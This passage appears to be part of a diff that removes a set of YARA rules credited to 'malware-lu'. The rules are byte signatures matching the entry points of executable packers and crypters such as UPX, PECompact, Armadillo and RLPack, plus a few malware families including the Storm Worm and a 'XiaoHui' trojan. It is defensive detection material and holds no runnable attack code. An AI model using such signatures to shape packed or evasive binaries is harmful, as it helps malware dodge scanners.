-}
-	
-	
-rule NTkrnlSecureSuiteNTkrnlteam
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 34 10 00 00 28 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 10 00 00 50 10 00 00 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 }
-
-condition:
-		$a0
-}
-	
-	
-rule PESpinv0b
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 72 C8 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 26 E8 01 00 00 00 EA 5A 33 C9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VXTibsZhelatinStormWormvariant
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FF 74 24 1C 58 8D 80 ?? ?? 77 04 50 68 62 34 35 04 E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MSLRHv032afakePEX099emadicius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 01 00 00 00 E8 83 C4 04 E8 01 00 00 00 E9 5D 81 ED FF 22 40 00 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NSPack3xLiuXingPing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? FF FF ?? 38 01 0F 84 ?? 02 00 00 ?? 00 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv25RetailBitsumTechnologies
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? 01 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WARNINGTROJANXiaoHui
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 9C E8 00 00 00 00 5D B8 ?? 85 40 00 2D ?? 85 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NFOv10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8D 50 12 2B C9 B1 1E 8A 02 34 77 88 02 42 E2 F7 C8 8C }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PMODEWv112116121133DOSextender
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FC 16 07 BF ?? ?? 8B F7 57 B9 ?? ?? F3 A5 06 1E 07 1F 5F BE ?? ?? 06 0E A4 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AaseCrypterbysantasdad
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 F0 53 B8 A0 3E 00 10 E8 93 DE FF FF 68 F8 42 00 10 E8 79 DF FF FF 68 00 43 00 10 68 0C 43 00 10 E8 42 DF FF FF 50 E8 44 DF FF FF A3 98 66 00 10 83 3D 98 66 00 10 00 75 13 6A 00 68 18 43 00 10 68 1C 43 00 10 6A 00 E8 4B DF FF FF 68 2C 43 00 10 68 0C 43 ?? ?? ?? ?? DF FF FF 50 E8 0E DF FF FF A3 94 66 00 10 83 3D 94 66 00 10 00 75 13 6A 00 68 18 43 00 10 68 38 43 00 10 6A 00 E8 15 DF FF FF 68 48 43 00 10 68 0C 43 00 10 E8 D6 DE FF FF 50 E8 D8 DE FF FF A3 A0 66 00 10 83 3D A0 66 00 10 00 75 13 6A 00 68 18 43 00 10 68 58 43 00 10 6A 00 E8 DF DE FF FF 68 6C 43 00 10 68 0C 43 00 10 E8 A0 DE FF FF 50 E8 A2 DE FF FF }
-
-condition:
-		$a0
-}
-	
-	
-rule aPackv098bJibz
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 93 07 1F 05 ?? ?? 8E D0 BC ?? ?? EA }
-
-condition:
-		$a0
-}
-	
-	
-rule UPackv011Dwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE 48 01 40 00 AD 8B F8 95 A5 33 C0 33 C9 AB 48 AB F7 D8 B1 04 F3 AB C1 E0 0A B5 1C F3 AB AD 50 97 51 AD 87 F5 58 8D 54 86 5C FF D5 72 5A 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1 E3 03 B3 00 8D 1C 5B 8D 9C 9E 0C 10 00 00 B0 01 67 E3 29 8B D7 }
-
-condition:
-		$a0
-}
-	
-	
-rule NsPacKNetLiuXingPing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 BB 01 47 65 74 53 79 73 74 65 6D 49 6E 66 6F 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 5E 00 5F 43 6F 72 ?? ?? ?? 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C }
-
-condition:
-		$a0
-}
-	
-	
-rule PseudoSigner02PENightMare2BetaAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E9 10 00 00 00 EF 40 03 A7 07 8F 07 1C 37 5D 43 A7 04 B9 2C 3A }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01MicrosoftVisualC60DebugVersionAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 51 90 90 90 01 01 90 90 90 90 68 ?? ?? ?? ?? 90 90 90 90 90 90 90 90 90 90 90 90 00 01 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 00 01 90 90 90 90 90 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule DJoinv07publicRC4encryptiondrmist
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { C6 05 ?? ?? 40 00 00 C6 05 ?? ?? 40 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UPXv103v104
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 8A 07 72 EB B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEDiminisherV01Teraphy
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 53 51 52 56 57 55 E8 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WWPACKv305c4ExtrPasswcheckVirshield
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 03 05 C0 1A B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ExeGuarderv18Exeiconcom
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 D0 53 56 57 8D 75 FC 8B 44 24 30 25 00 00 FF FF 81 38 4D 5A 90 00 74 07 2D 00 10 00 00 EB F1 89 45 FC E8 C8 FF FF FF 2D B2 04 00 00 89 45 F4 8B 06 8B 40 3C 03 06 8B 40 78 03 06 8B C8 8B 51 20 03 16 8B 59 24 03 1E 89 5D F0 8B 59 1C 03 1E 89 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule codeCrypter031Tibbar
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 58 53 5B 90 BB ?? ?? ?? 00 FF E3 90 CC CC CC 55 8B EC 5D C3 CC CC CC CC CC CC CC CC CC CC CC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPv073betaap0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 8B DD E8 00 00 00 00 5D 95 32 C0 95 89 9D 80 00 00 00 B8 42 31 40 00 BB 41 30 40 00 2B C3 03 C5 33 D2 8A 10 40 B9 ?? ?? 00 00 8B F9 30 10 8A 10 40 49 75 F8 64 EF 86 3D 30 00 00 0F B9 FF 4B 89 52 5C 4C BD 77 C2 0C CE 88 4E 2D E8 00 00 00 5D 0D DB 5E 56 }
-
-condition:
-		$a0
-}
-	
-	
-rule PEnguinCryptv10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 93 ?? ?? 00 55 50 67 64 FF 36 00 00 67 64 89 26 00 00 BD 4B 48 43 42 B8 04 00 00 00 CC 3C 04 75 04 90 90 C3 90 67 64 8F 06 00 00 58 5D BB 00 00 40 00 33 C9 33 C0 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MetrowerksCodeWarriorDLLv20
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 53 56 57 8B 75 0C 8B 5D 10 83 FE 01 74 05 83 FE 02 75 12 53 56 FF 75 08 E8 6E FF FF FF 09 C0 75 04 31 C0 EB 21 53 56 FF 75 08 E8 ?? ?? ?? ?? 89 C7 09 F6 74 05 83 FE 03 75 0A 53 56 FF 75 08 E8 47 FF FF FF 89 F8 8D 65 F4 5F 5E 5B 5D C2 0C 00 C9 }
-
-condition:
-		$a0
-}
-	
-	
-rule PECrc32088ZhouJinYu
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED B6 A4 45 00 8D BD B0 A4 45 00 81 EF 82 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv123b3v1241
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 70 40 90 ?? 90 01 85 9E 70 40 BB ?? D2 08 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Noodlecrypt2rsc
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 9A E8 76 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPack120BasicEditionLZMAAp0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 83 7C 24 28 01 75 0C 8B 44 24 24 89 85 9C 0C 00 00 EB 0C 8B 85 98 0C 00 00 89 85 9C 0C 00 00 8D B5 C4 0C 00 00 8D 9D 82 04 00 00 33 FF 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 2D 0C 00 00 89 85 94 0C 00 00 E8 59 01 00 00 EB 20 60 8B 85 9C 0C 00 00 FF B5 94 0C 00 00 FF 34 37 01 04 24 FF 74 37 04 01 04 24 FF D3 61 83 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01PENightMare2BetaAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E9 10 00 00 00 EF 40 03 A7 07 8F 07 1C 37 5D 43 A7 04 B9 2C 3A E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AHTeamEPProtector03fakeXtremeProtector105FEUERRADER
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 E8 00 00 00 00 5D 81 00 00 00 00 00 6A 45 E8 A3 00 00 00 68 00 00 00 00 E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPackv118BasicDLLLZMAAp0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 21 0B 00 00 8D 9D FF 02 00 00 33 FF E8 9F 01 00 00 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 AA 0A 00 00 89 85 F9 0A 00 00 EB 14 60 FF B5 F9 0A }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CrypKeyv5v6
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? ?? ?? 58 83 E8 05 50 5F 57 8B F7 81 EF ?? ?? ?? ?? 83 C6 39 BA ?? ?? ?? ?? 8B DF B9 0B ?? ?? ?? 8B 06 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule InnoSetupModulev109a
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 C0 53 56 57 33 C0 89 45 F0 89 45 C4 89 45 C0 E8 A7 7F FF FF E8 FA 92 FF FF E8 F1 B3 FF FF 33 C0 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ObsidiumV1300ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 04 ?? ?? ?? ?? E8 29 00 00 00 }
-	$a1 = { EB 04 ?? ?? ?? ?? E8 ?? 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule PCryptv351
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 43 52 59 50 54 FF 76 33 2E 35 31 00 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ThinstallEmbedded2312Jitit
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 6A 00 FF 15 ?? ?? ?? ?? E8 D4 F8 FF FF E9 E9 AD FF FF FF 8B C1 8B 4C 24 04 89 88 29 04 00 00 C7 40 0C 01 00 00 00 0F B6 49 01 D1 E9 89 48 10 C7 40 14 80 00 00 00 C2 04 00 8B 44 24 04 C7 41 0C 01 00 00 00 89 81 29 04 00 00 0F B6 40 01 D1 E8 89 41 10 C7 41 14 80 00 00 00 C2 04 00 55 8B EC 53 56 57 33 C0 33 FF 39 45 0C 8B F1 76 0C 8B 4D 08 03 3C 81 40 3B 45 0C 72 F4 8B CE E8 43 00 00 00 8B 46 14 33 D2 F7 F7 8B 5E 10 33 D2 8B F8 8B C3 F7 F7 89 7E 18 89 45 0C 33 C0 33 C9 8B 55 08 03 0C 82 40 39 4D 0C 73 F4 48 8B 14 82 2B CA 0F AF CF 2B D9 0F AF FA 89 7E 14 89 5E 10 5F 5E 5B 5D C2 08 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WWPACKv305c4Extractable
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 03 05 00 1A B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPackAp0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 2C 0A 00 00 8D 9D 22 02 00 00 33 FF E8 83 01 00 00 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 CD 09 00 00 89 85 14 0A 00 00 EB 14 60 FF B5 14 0A }
-	$a1 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 5A 0A 00 00 8D 9D 40 02 00 00 33 FF E8 83 01 00 00 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 EB 09 00 00 89 85 3A 0A 00 00 EB 14 60 FF B5 3A 0A }
-	$a2 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 EB 03 0C 00 00 EB 03 0C 00 00 8D B5 CB 22 00 00 8D 9D F0 02 00 00 33 FF E8 47 02 00 00 EB 03 15 00 00 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 9B 0A }
-	$a3 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 2C 0A 00 00 8D 9D 22 02 00 00 33 FF E8 ?? ?? ?? ?? 6A 40 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 CD 09 00 00 89 85 ?? ?? ?? ?? EB 14 60 FF B5 14 0A }
-	$a4 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 5A 0A 00 00 8D 9D 40 02 00 00 33 FF E8 ?? ?? ?? ?? 6A 40 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 EB 09 00 00 89 85 ?? ?? ?? ?? EB 14 60 FF B5 3A 0A }
-	$a5 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 8D B5 CB 22 00 00 8D 9D F0 02 00 00 33 FF E8 ?? ?? ?? ?? EB 03 ?? ?? ?? 6A 40 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 9B 0A }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point or $a3 at pe.entry_point or $a4 at pe.entry_point or $a5 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02VOBProtectCD5Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 36 3E 26 8A C0 60 E8 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PESpinv04x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 68 60 E8 00 00 00 00 8B }
-
-condition:
-		$a0
-}
-	
-	
-rule PseudoSigner02WatcomCCDLLAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 53 56 57 55 8B 74 24 14 8B 7C 24 18 8B 6C 24 1C 83 FF 03 0F 87 01 00 00 00 F1 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule yodasCrypter13AshkbizDanehkar
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 53 56 57 60 E8 00 00 00 00 5D 81 ED 6C 28 40 00 B9 5D 34 40 00 81 E9 C6 28 40 00 8B D5 81 C2 C6 28 40 00 8D 3A 8B F7 33 C0 EB 04 90 EB 01 C2 AC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule D1NS1GD1N
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 18 37 00 00 00 00 00 00 01 00 0A 00 00 00 18 00 00 80 00 00 00 00 ?? ?? 18 37 00 00 00 00 02 00 00 00 88 00 00 80 38 00 00 80 96 00 00 80 50 00 00 80 00 00 00 00 ?? ?? 18 37 00 00 00 00 00 00 01 00 00 00 00 00 68 00 00 00 00 00 00 00 ?? ?? 18 37 00 00 00 00 00 00 01 00 00 00 00 00 78 00 00 00 B0 F0 00 00 10 00 00 00 00 00 00 00 00 00 00 00 C0 F0 00 00 60 00 00 00 00 00 00 00 00 00 00 00 06 00 44 00 56 00 43 00 4C 00 41 00 4C 00 0B 00 50 00 41 00 43 00 4B 00 41 00 47 00 45 00 49 00 4E 00 46 00 4F 00 00 00 00 00 00 00 00 00 00 00 00 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule FSGv110EngdulekxtMicrosoftVisualC6070ASM
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 01 00 00 00 5A 5E E8 02 00 00 00 BA DD 5E 03 F2 EB 01 64 BB 80 ?? ?? 00 8B FA EB 01 A8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASPackv102aAlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED 3E D9 43 ?? B8 38 ?? ?? ?? 03 C5 2B 85 0B DE 43 ?? 89 85 17 DE 43 ?? 80 BD 01 DE 43 ?? ?? 75 15 FE 85 01 DE 43 ?? E8 1D ?? ?? ?? E8 79 02 ?? ?? E8 12 03 ?? ?? 8B 85 03 DE 43 ?? 03 85 17 DE 43 ?? 89 44 24 1C 61 FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01MinGWGCC2xAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 E8 02 00 00 00 C9 C3 90 90 45 58 45 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov253
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 40 ?? ?? ?? 68 54 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 58 ?? ?? ?? 33 D2 8A D4 89 15 EC }
-	$a1 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 40 ?? ?? ?? ?? 68 54 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF ?? ?? ?? 15 58 33 D2 8A D4 89 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule Armadillov252
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? E0 ?? ?? ?? ?? 68 D4 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF ?? ?? ?? 15 38 }
-	$a1 = { 55 8B EC 6A FF 68 E0 ?? ?? ?? 68 D4 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 38 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule Armadillov251
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 B8 ?? ?? ?? 68 D0 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 20 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov250
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 B8 ?? ?? ?? 68 F8 ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 20 ?? ?? ?? 33 D2 8A D4 89 15 D0 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Obsidium1331ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 01 ?? EB 04 ?? ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 02 ?? ?? E8 5F 27 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CExev10a
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 81 EC 0C 02 ?? ?? 56 BE 04 01 ?? ?? 8D 85 F8 FE FF FF 56 50 6A ?? FF 15 54 10 40 ?? 8A 8D F8 FE FF FF 33 D2 84 C9 8D 85 F8 FE FF FF 74 16 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule DIETv144v145f
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { F8 9C 06 1E 57 56 52 51 53 50 0E FC 8C C8 BA ?? ?? 03 D0 52 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv098
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB D7 84 40 ?? 87 DD 8B 85 5C 85 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv099
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 2F 85 40 ?? 87 DD 8B 85 B4 85 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NsPacKV30LiuXingPing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? ?? ?? 66 8B 06 66 83 F8 00 74 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv110EngdulekxtMicrosoftVisualBasic5060
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { C1 CB 10 EB 01 0F B9 03 74 F6 EE 0F B6 D3 8D 05 83 ?? ?? EF 80 F3 F6 2B C1 EB 01 DE 68 77 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv090
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? 40 00 C3 9C 60 BD ?? ?? 00 00 B9 02 00 00 00 B0 90 8D BD 7A 42 40 00 F3 AA 01 AD D9 43 40 00 FF B5 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv092
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 BD ?? ?? ?? ?? B9 02 ?? ?? ?? B0 90 8D BD A5 4F 40 ?? F3 AA 01 AD 04 51 40 ?? FF B5 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv094
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 ?? ?? ?? ?? 5D 55 58 81 ED ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 01 85 ?? ?? ?? ?? 50 B9 02 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PeX099bartCrackPl
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 F5 ?? ?? ?? 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ObsidiumV1304ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 02 ?? ?? E8 ?? 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SoftwareCompressv14LITEBGSoftwareProtectTechnologies
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 81 2C 24 AA 1A 41 00 5D E8 00 00 00 00 83 2C 24 6E 8B 85 5D 1A 41 00 29 04 24 8B 04 24 89 85 5D 1A 41 00 58 8B 85 5D 1A 41 00 8B 50 3C 03 D0 8B 92 80 00 00 00 03 D0 8B 4A 58 89 8D 49 1A 41 00 8B 4A 5C 89 8D 4D 1A 41 00 8B 4A 60 89 8D 55 1A }
